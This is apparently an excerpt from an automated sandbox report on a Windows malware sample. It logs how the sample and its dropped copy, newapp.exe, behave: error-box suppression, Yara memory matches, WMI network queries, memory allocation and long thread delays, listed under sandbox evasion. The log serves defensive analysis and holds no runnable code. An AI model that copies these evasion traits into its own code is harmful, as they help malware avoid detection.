                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: dhPWt112uC.exe PID: 7404, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 8136, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeMemory allocated: B70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeMemory allocated: 2760000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeMemory allocated: 24E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeMemory allocated: 75C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeMemory allocated: 85C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeMemory allocated: 8770000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeMemory allocated: 9770000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeMemory allocated: 17D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeMemory allocated: 33D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: D80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 4AE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 74A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 84A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 8640000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 9640000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 1770000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 3210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 1770000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 1510000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 3230000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 3040000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 7A00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 77A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 8A00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 9A00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 10D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 2C70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 2AB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599753Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599625Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599516Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599391Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599280Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599168Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 599062Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598951Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598842Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598703Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598487Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598349Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598219Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597891Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597563Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597438Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597203Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 597094Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596969Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596750Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596640Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596422Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596312Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595968Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595842Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595732Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595625Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595516Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595406Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595285Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595156Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 595047Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594938Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594813Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594700Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594593Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594484Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594375Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594251Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594125Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 594016Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeThread delayed: delay time: 593906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599538Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599434Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599325Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599214Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598884Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598764Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598655Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596162Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595937Jump to behavior
